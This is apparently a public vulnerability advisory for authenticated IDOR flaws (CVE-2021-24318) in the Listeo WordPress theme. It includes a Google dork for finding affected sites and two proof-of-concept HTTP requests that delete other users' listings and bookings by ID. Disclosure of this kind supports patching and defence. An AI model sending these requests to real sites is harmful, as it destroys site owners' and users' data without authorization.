/*! - # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities - # GOOGLE DORK: inurl:/wp-content/themes/listeo/ - # DATE: 2021-02-10 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Purethemes [ https://purethemes.net ] - # SOFTWARE VERSION: <= 1.6.10 - # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259 - # CVSS: Multiple - # CWE: CWE-639 - # CVE: CVE-2021-24318 */ ### -- [ Info: ] [i] Multiple Authenticated IDOR vulnerabilities was discovered in the Listeo theme through v1.6.10 for WordPress. [i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ]. ### -- [ Vulnerabilities: ] [x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce=. [x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted. ### -- [ Impact: ] [~] Possibility to remove any content from the targeted website, up to the complete erasure of all content entirely. ### -- [ CVSS 3.1: ] [%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U [%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U ### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ] [!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100 [!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1 Host: listeo.pro Cookie: [user cookies] ### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ] [!] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: listeo.pro Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Cookie: [user cookies] action=listeo_bookings_manage&booking_id=13&status=deleted ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze